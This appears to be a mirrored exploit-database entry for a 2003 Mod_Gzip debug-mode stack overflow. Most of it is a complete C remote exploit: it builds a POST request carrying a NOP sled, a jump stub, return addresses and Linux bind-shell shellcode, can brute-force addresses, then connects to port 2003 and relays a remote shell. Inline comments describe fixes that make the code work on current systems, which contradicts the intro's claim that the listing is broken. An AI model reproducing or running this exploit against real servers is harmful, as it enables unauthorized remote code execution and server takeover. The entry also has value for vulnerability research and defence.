Mod_Gzip 1.3.x – Debug Mode

Mod_Gzip 1.3.x – Debug Mode

漏洞ID 1053864 漏洞类型
发布时间 2003-05-06 更新时间 2003-05-06
漏洞平台 Unix CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22699
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7769/info

Mod_gzip is reported prone to a stack overflow, a format string vulnerability and a file corruption issue caused by a predictable naming scheme for its log files. Exploitation could result in execution of attacker-supplied code or corruption of critical or sensitive files. These issues reportedly occur only when the module is run in debug mode, so disabling debug mode on production servers removes the exposure. The proof-of-concept below sends an oversized query string in a POST request carrying `Accept-Encoding: gzip` and then expects a bind shell on TCP port 2003; its hard-coded return and stderr addresses are for the RedHat 8.0 build only, and the listing as published has lost the backslashes of its C escape sequences (`rn` for `\r\n`, `x31xc0` for `\x31\xc0`), so it must be repaired before it compiles into a working request.

/*
 *  [exploit code] for mod_gzip (with debug_mode) <= 1.2.26.1a
 *
 *  Created by xCrZx [[email protected]] /05.06.03/
 *
 *  Tested on RedHat 8.0 (Psyche) (a target entry for it is included);
 *  also tested on FreeBSD 4.7 (1.3.19.2a), for which no target entry is
 *  included :)
 */

/*

/       Single mode:

/       [crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost

/       remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
                       by xCrZx [[email protected]] /05.06.03/
/
       Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/
       [!] Connecting to localhost:80
/       [+] Connected!
       [*] Trying to connect to localhost:2003 port!!! Pray for success!
/       [*] Sleeping at 2 seconds...

/       [!] Shell is accessible!

/       uid=99(nobody) gid=99(nobody) groups=99(nobody)
       Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/
       Brute mode:
/
       [crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
       remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/                        by xCrZx [[email protected]] /05.06.03/

/       Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000

/       [~] Brutemode activated!
       .
/       [!] Shell is accessible!

/       uid=99(nobody) gid=99(nobody) groups=99(nobody)
       Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/

*/



#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>


#define STEP 1000

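/*
 * HTTP request skeleton filled in by main():
 *   %s  query string: NOP sled, jump stub, NOP sled, stderr address and
 *       the repeated return address
 *   %s  Host header value
 *   %d  Content-Length of the body
 *   %s  body: NOP sled followed by the bind-shell payload
 * Header lines are CRLF-terminated as HTTP requires; the published listing
 * had lost the backslashes ("rn"), which produced a request no server parses.
 */
const char fmt[] =
        "POST /?%s HTTP/1.1\r\n"
        "Content-Type: text/html\r\n"
        "Host: %s\r\n"
        "Content-Length: %d\r\n"
        "Accept-Encoding: gzip, deflate\r\n\r\n"
        "%s\r\n\r\n";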


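/*
 * One exploitation target: the addresses and payloads for a specific build
 * of the vulnerable host.  main() copies the selected entry's fields and
 * usage() lists the names; both stop at the NULL-named terminator entry.
 */
struct TARGETS {
        char *distr;        /* distribution label shown by usage() */
        long ret;           /* stack address written over the saved return address */
        long std_err;       /* address of stderr, written once before the ret copies */
        char *shellcode;    /* payload carried in the POST body */
        char *jmp;          /* stub carried in the query string; jumps into the body */
} targets[] = {

        /* you can add targets here, before the terminator entry */

        {"RedHat 8.0 (Psyche)",
         0xbfffd8f0,
         0x42127480,
         /* Linux x86 bind shell: fork, then four socketcall()s (socket,
          * bind, listen, accept), dup2 the client onto fds 0-2 and
          * execve "//bin/sh".  The bound port is the 0x07d3 (2003) that
          * follows "\x66\xc7\x45\x16" below; it must match the port
          * main() connects back to. */
         "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
         "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
         "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
         "\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
         "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
         "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
         "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
         "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80",

         /*
          * Jump stub, built from constants that avoid bytes unsafe in a URL:
          *     movl $0xa1a51baa,%ebx
          *     addl $0x66666666,%ebx     ; wraps to 0x080b8210
          *     jmp  *%ebx                ; into the heap copy of the body
          */
         "\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"
        },

        /* terminator: usage() and the -t bounds check in main() stop here */
        {NULL, 0, 0, NULL, NULL}
};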


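/*
 * Resolve hostname (dotted quad or DNS name) to an IPv4 address in network
 * byte order.  Exits the process when the name cannot be resolved.
 *
 * The result is returned as long to keep the caller-visible signature
 * (sockstruct.sin_addr.s_addr = getip(...)); only the low 32 bits are used.
 */
long getip(char *hostname) {
        struct hostent *he;
        in_addr_t addr = inet_addr(hostname);

        /* inet_addr() reports failure as INADDR_NONE.  The original "< 0"
         * test only worked where long is 32 bits; on LP64 hosts the widened
         * value is never negative, so names were never looked up. */
        if (addr == INADDR_NONE) {
                he = gethostbyname(hostname);
                if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL) {
                        /* perror() would print an unrelated errno here */
                        fprintf(stderr, "gethostbyname(%s) failed\n", hostname);
                        exit(-1);
                }
                memcpy(&addr, he->h_addr_list[0], sizeof addr);
        }
        return (long)addr;
}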

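/*
 * Print the command-line help and the target table, then exit(0).
 * prog: argv[0], echoed in the usage line.
 */
void usage(char *prog) {
        size_t ntargets = sizeof targets / sizeof targets[0];
        size_t i;

        printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] [-b addr] [-s step_num]\n\nTargets:\n", prog);
        /* Bounded by the array size as well as by a NULL name, so the scan
         * cannot run off the end of a table that has no terminator entry. */
        for (i = 0; i < ntargets && targets[i].distr != NULL; i++)
                printf("\t[%zu] -> %s\n", i, targets[i].distr);
        printf("\n");
        exit(0);
}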

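/* Payload layout constants (bytes). */
enum {
        URL_SLED1  = 2016,  /* NOPs placed before the jump stub in the query string */
        URL_SLED2  = 2280,  /* NOPs between the stub and the address area */
        RET_COPIES = 100,   /* repetitions of ret written after the stderr address */
        BODY_SLED  = 1000,  /* NOPs placed before the shellcode in the POST body */
        SHELL_PORT = 2003   /* port the shellcode binds (0x07d3 in the target table) */
};

/*
 * Store v as four little-endian bytes at p (the target is 32-bit x86).
 * The original stored sizeof(long) bytes in host order: 4 on the 32-bit
 * hosts it was written on, but 8 on LP64 hosts, where the zero high bytes
 * ended the string and every later address landed on the same spot.
 */
static void put32le(char *p, unsigned long v)
{
        p[0] = (char)(v & 0xff);
        p[1] = (char)((v >> 8) & 0xff);
        p[2] = (char)((v >> 16) & 0xff);
        p[3] = (char)((v >> 24) & 0xff);
}

/* Connect a TCP socket to host:port.  Returns the fd, or -1 with errno set. */
static int tcp_connect(char *host, int port)
{
        struct sockaddr_in sa;
        int fd = socket(PF_INET, SOCK_STREAM, 0);

        if (fd < 0)
                return -1;
        memset(&sa, 0, sizeof sa);
        sa.sin_family = AF_INET;
        sa.sin_port = htons((unsigned short)port);
        sa.sin_addr.s_addr = (in_addr_t)getip(host);
        if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
                int saved = errno;
                close(fd);
                errno = saved;
                return -1;
        }
        return fd;
}

/*
 * Build the request into out (cap bytes).  Query string: sled, jump stub,
 * sled, stderr address, RET_COPIES copies of ret.  Body: sled + shellcode.
 * Returns the request length, or -1 if the pieces do not fit.  Both pieces
 * go through "%s", so a zero byte inside an address truncates the request
 * there, the same limit the original strlen()-based appends had.
 */
static int build_request(char *out, size_t cap, char *victim,
                         unsigned long ret, unsigned long ret_err,
                         const char *shellcode, const char *jmp)
{
        char url[5000], body[10000];
        size_t jlen = strlen(jmp), slen = strlen(shellcode), off;
        int k, n;

        if (URL_SLED1 + jlen + URL_SLED2 + 4 * (RET_COPIES + 1) >= sizeof url ||
            BODY_SLED + slen >= sizeof body)
                return -1;

        memset(url, 0x90, URL_SLED1);
        off = URL_SLED1;
        memcpy(url + off, jmp, jlen);
        off += jlen;
        memset(url + off, 0x90, URL_SLED2);
        off += URL_SLED2;
        put32le(url + off, ret_err);
        off += 4;
        for (k = 0; k < RET_COPIES; k++, off += 4)
                put32le(url + off, ret);
        url[off] = '\0';

        memset(body, 0x90, BODY_SLED);
        memcpy(body + BODY_SLED, shellcode, slen);
        body[BODY_SLED + slen] = '\0';

        n = snprintf(out, cap, fmt, url, victim, (int)(BODY_SLED + slen), body);
        if (n < 0 || (size_t)n >= cap)
                return -1;
        return n;
}

/*
 * Relay stdin/stdout to the bound shell.  Exits the process when the shell
 * closes the connection; returns -1 only if select() fails.
 */
static int relay_shell(int sock)
{
        char io[20000];
        fd_set rset;
        ssize_t n;

        printf("\n[!] Shell is accessible!\n\n");
        if (write(sock, "id;uname -a\n", 12) != 12)
                perror("write()");
        for (;;) {
                FD_ZERO(&rset);
                FD_SET(sock, &rset);
                FD_SET(STDIN_FILENO, &rset);
                if (select(sock + 1, &rset, NULL, NULL, NULL) < 0) {
                        if (errno == EINTR)
                                continue;
                        perror("select()");
                        return -1;
                }
                if (FD_ISSET(sock, &rset)) {
                        n = read(sock, io, sizeof io - 1);
                        if (n <= 0) {
                                printf("[!] Connection closed.\n");
                                close(sock);
                                exit(0);
                        }
                        /* fwrite, not "%s": shell output may hold NUL bytes */
                        fwrite(io, 1, (size_t)n, stdout);
                        fflush(stdout);
                }
                if (FD_ISSET(STDIN_FILENO, &rset)) {
                        n = read(STDIN_FILENO, io, sizeof io - 1);
                        if (n > 0 && write(sock, io, (size_t)n) != n)
                                perror("write()");
                }
        }
}

/*
 * Parse options, send the crafted POST, then try the bind shell.  In brute
 * mode (-b) the return address is lowered by -s per attempt until a shell
 * answers.  Exit status: 0 on the original code paths, 1 on argument or
 * buffer errors introduced by the added checks.
 */
int main(int argc, char **argv) {
        char req[20000];
        int i, sock, n;
        int port = 80, step = STEP, brutemode = 0, trg = 0;
        char *victim = NULL, *shellcode, *jmp;
        unsigned long ret = 0xbfffffff, ret_err;
        size_t ntargets = sizeof targets / sizeof targets[0];

        printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [[email protected]] /05.06.03/\n");

        /* Every option takes one value.  Only "-x" tokens are options: the
         * original matched argv[i][1] on every argument, so a hostname such
         * as "thehost" was mis-read as -h and its value read past argv. */
        for (i = 1; i < argc; i++) {
                char *val;

                if (argv[i][0] != '-' || argv[i][1] == '\0')
                        continue;
                if (i + 1 >= argc)
                        usage(argv[0]);
                val = argv[++i];
                switch (argv[i - 1][1]) {
                case 'h':
                        victim = val;
                        break;
                case 'p':
                        port = atoi(val);
                        if (port <= 0 || port > 65535)
                                usage(argv[0]);
                        break;
                case 't':
                        trg = atoi(val);
                        /* the original indexed the table with any number */
                        if (trg < 0 || (size_t)trg >= ntargets || targets[trg].distr == NULL)
                                usage(argv[0]);
                        ret = (unsigned long)targets[trg].ret;
                        break;
                case 'r':
                        /* accepts "0x..." as before, and bare hex too */
                        ret = strtoul(val, NULL, 16);
                        break;
                case 'b':
                        brutemode = 1;
                        ret = strtoul(val, NULL, 16);
                        break;
                case 's':
                        step = atoi(val);
                        break;
                default:
                        usage(argv[0]);
                }
        }

        if (victim == NULL || ret == 0)
                usage(argv[0]);
        if (brutemode && step <= 0) {
                /* step 0 would retry the same address forever */
                fprintf(stderr, "[x] Error: step must be positive\n");
                return 1;
        }

        ret_err = (unsigned long)targets[trg].std_err;
        shellcode = targets[trg].shellcode;
        jmp = targets[trg].jmp;

        printf("\nUsing: ret_err = 0x%lx, ret = 0x%lx", ret_err, ret);
        if (brutemode)
                printf(" ,step = %d\n", step);
        printf("\n");
        if (brutemode)
                printf("[~] Brutemode activated!\n");

        do {
                if (!brutemode)
                        printf("\n[!] Connecting to %s:%d\n", victim, port);
                sock = tcp_connect(victim, port);
                if (sock < 0) {
                        printf("[x] Error: Could not connect to %s:%d!\n", victim, port);
                        exit(0);
                }
                if (!brutemode)
                        printf("[+] Connected!\n");

                n = build_request(req, sizeof req, victim, ret, ret_err, shellcode, jmp);
                if (n < 0) {
                        fprintf(stderr, "[x] Error: request does not fit its buffer\n");
                        close(sock);
                        return 1;
                }
                if (write(sock, req, (size_t)n) != n)
                        perror("write()");
                close(sock);

                ret -= (unsigned long)step;

                if (brutemode) {
                        printf(".");
                        fflush(stdout);
                } else {
                        printf("[*] Trying to connect to %s:%d port!!! Pray for success!\n", victim, SHELL_PORT);
                        printf("[*] Sleeping at 2 seconds...\n");
                }
                sleep(2);

                sock = tcp_connect(victim, SHELL_PORT);
                if (sock >= 0) {
                        /* returns only on a select() failure */
                        relay_shell(sock);
                        close(sock);
                        return 1;
                }
                if (!brutemode)
                        printf("[x] Shell is inaccessible..\n\n");
        } while (brutemode);

        return 0;
}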
